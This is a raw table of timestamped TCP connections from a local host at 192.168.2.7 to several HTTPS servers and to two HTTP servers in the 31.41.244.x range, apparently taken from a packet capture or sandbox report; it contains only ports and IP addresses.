Sep 6, 2024 09:57:52.677865982 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.482841969 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.482949018 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.523421049 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.523443937 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.523751974 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.524970055 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.524970055 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.524990082 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.914149046 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.914220095 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.915082932 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.915946007 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.915981054 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.916004896 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.916012049 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.941416979 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.941462040 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.941642046 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.942310095 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:53.942321062 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:53.958719015 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 6, 2024 09:57:54.002959967 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.003000021 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.003124952 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.003400087 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.003411055 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.398591995 CEST	443	49698	104.98.116.138	192.168.2.7
Sep 6, 2024 09:57:54.400433064 CEST	49698	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:57:54.743442059 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.743967056 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.743987083 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.751235962 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.751243114 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.751312017 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.751318932 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.793399096 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.794173956 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.794188976 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.795279980 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.795284986 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:54.795347929 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:54.795355082 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:55.060194969 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:55.060275078 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:55.064385891 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:55.067661047 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:55.067661047 CEST	49703	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:55.067682028 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:55.067692041 CEST	443	49703	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:56.958935022 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:56.958966017 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:56.958985090 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:56.959069967 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:56.959108114 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:56.959124088 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:56.959127903 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:56.959218025 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:56.959893942 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:56.959913015 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:56.959923029 CEST	49704	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:56.959928036 CEST	443	49704	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:57.400923967 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:57.400964975 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:57.401062965 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:57.401278973 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:57.401298046 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.233186007 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.234122992 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.234139919 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.235085964 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.235091925 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.235178947 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.235198975 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.771341085 CEST	49671	443	192.168.2.7	204.79.197.203
Sep 6, 2024 09:57:58.852222919 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.852257013 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.852293968 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.852335930 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.852348089 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.852360010 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.852369070 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.852420092 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.853007078 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.853007078 CEST	49705	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.853029966 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.853039026 CEST	443	49705	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.907787085 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.907821894 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:58.907973051 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.908124924 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:58.908137083 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:59.716670036 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:59.717277050 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:59.717293978 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:59.717916965 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:59.717922926 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:59.717953920 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:59.717962980 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:59.912115097 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 6, 2024 09:58:00.090325117 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.090353966 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.090396881 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.090482950 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.090558052 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.090696096 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.091219902 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.091243029 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.091257095 CEST	49706	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.091262102 CEST	443	49706	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.143879890 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.143929958 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.144011974 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.144253969 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.144267082 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.165452957 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.165504932 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.165576935 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.165874004 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.165889025 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.928790092 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.929622889 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.929655075 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.931067944 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.931075096 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.931111097 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.931129932 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.950978994 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.951119900 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.963044882 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.963074923 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.963346958 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:00.963762045 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.963805914 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:00.963829994 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.281152010 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.281184912 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.281205893 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.281286955 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.281313896 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.281608105 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.281652927 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.282161951 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.282176971 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.282188892 CEST	49707	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.282195091 CEST	443	49707	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.333945990 CEST	49709	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:01.333988905 CEST	443	49709	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:01.334068060 CEST	49709	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:01.334558010 CEST	49709	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:01.334572077 CEST	443	49709	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:01.368844032 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.368863106 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.368925095 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.368937016 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.368989944 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.369312048 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.369342089 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.369355917 CEST	49708	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.369364977 CEST	443	49708	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.426388979 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.426429033 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:01.426500082 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.426716089 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:01.426727057 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.122823954 CEST	443	49709	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:02.122905016 CEST	49709	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.138715029 CEST	49709	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.138744116 CEST	443	49709	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:02.139358997 CEST	443	49709	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:02.153131008 CEST	49709	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.153472900 CEST	443	49709	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:02.153533936 CEST	49709	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.292697906 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.294003010 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:02.294014931 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.295325041 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:02.295332909 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.295382023 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:02.295389891 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.334188938 CEST	49711	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.334234953 CEST	443	49711	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:02.334305048 CEST	49711	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.334661007 CEST	49711	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.334672928 CEST	443	49711	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:02.740658998 CEST	49711	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.859901905 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.859936953 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.859976053 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.860011101 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:02.860038042 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.860054970 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.860065937 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:02.860100985 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:02.861428976 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:02.861454964 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.861470938 CEST	49710	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:02.861475945 CEST	443	49710	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:02.914675951 CEST	49712	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.914721966 CEST	443	49712	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:02.914782047 CEST	49712	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.915163040 CEST	49712	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:02.915175915 CEST	443	49712	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:03.059452057 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:03.059506893 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:03.059602976 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:03.061438084 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:03.061449051 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:03.067317963 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:03.067337036 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:03.067401886 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:03.067641020 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:03.067650080 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:03.091762066 CEST	49698	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:58:03.092329025 CEST	49715	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:58:03.092386007 CEST	443	49715	104.98.116.138	192.168.2.7
Sep 6, 2024 09:58:03.092514038 CEST	49715	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:58:03.093797922 CEST	49715	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:58:03.093820095 CEST	443	49715	104.98.116.138	192.168.2.7
Sep 6, 2024 09:58:03.096654892 CEST	443	49698	104.98.116.138	192.168.2.7
Sep 6, 2024 09:58:03.674546957 CEST	443	49712	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:03.674612045 CEST	49712	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:03.676229954 CEST	49712	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:03.676240921 CEST	443	49712	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:03.676584005 CEST	443	49712	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:03.678225994 CEST	49712	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:03.678289890 CEST	443	49712	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:03.678389072 CEST	49712	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:03.745073080 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:03.745130062 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:03.749098063 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:03.749119997 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:03.749548912 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:03.784621000 CEST	49716	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:03.784673929 CEST	443	49716	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:03.784771919 CEST	49716	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:03.785132885 CEST	49716	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:03.785146952 CEST	443	49716	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:03.802534103 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:03.814657927 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:03.841157913 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:03.841757059 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:03.841775894 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:03.842636108 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:03.842643023 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:03.842745066 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:03.842756033 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:03.860505104 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.026180983 CEST	49717	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:04.030987978 CEST	80	49717	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:04.031065941 CEST	49717	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:04.031332970 CEST	49717	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:04.036088943 CEST	80	49717	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:04.038619995 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.038650036 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.038656950 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.038670063 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.038676977 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.038682938 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.038728952 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:04.038757086 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.038773060 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:04.038795948 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:04.039165974 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.039221048 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:04.039227962 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.039530993 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.039614916 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:04.054356098 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:04.054390907 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.054405928 CEST	49713	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:04.054413080 CEST	443	49713	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:04.237376928 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:04.237399101 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:04.237438917 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:04.237482071 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:04.237514973 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:04.237529993 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:04.237796068 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:04.237873077 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:04.238066912 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:04.238086939 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:04.238096952 CEST	49714	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:58:04.238101959 CEST	443	49714	20.190.160.22	192.168.2.7
Sep 6, 2024 09:58:04.562103033 CEST	443	49716	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:04.562227011 CEST	49716	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:04.563806057 CEST	49716	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:04.563827991 CEST	443	49716	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:04.564095974 CEST	443	49716	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:04.565330982 CEST	49716	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:04.565388918 CEST	443	49716	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:04.565442085 CEST	49716	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:04.754137039 CEST	80	49717	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:04.754231930 CEST	49717	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:04.768570900 CEST	49717	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:04.773539066 CEST	80	49717	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:04.950258017 CEST	49718	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:04.950309038 CEST	443	49718	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:04.950378895 CEST	49718	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:04.950849056 CEST	49718	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:04.950861931 CEST	443	49718	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:05.019265890 CEST	80	49717	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:05.019454956 CEST	49717	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:05.050477028 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.055382967 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.060456038 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.079020023 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.084265947 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.744740009 CEST	443	49718	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:05.744816065 CEST	49718	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:05.746181965 CEST	49718	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:05.746191978 CEST	443	49718	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:05.746445894 CEST	443	49718	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:05.747605085 CEST	49718	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:05.747653008 CEST	443	49718	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:05.747766972 CEST	443	49718	4.231.128.59	192.168.2.7
Sep 6, 2024 09:58:05.747821093 CEST	49718	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:05.747845888 CEST	49718	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:58:05.775950909 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.775965929 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.775979042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.775991917 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.776089907 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.776089907 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.776177883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.776200056 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.776211977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.776222944 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.776233912 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.776236057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.776262045 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:05.776262045 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:05.776292086 CEST	49719	80	192.168.2.7	31.41.244.11
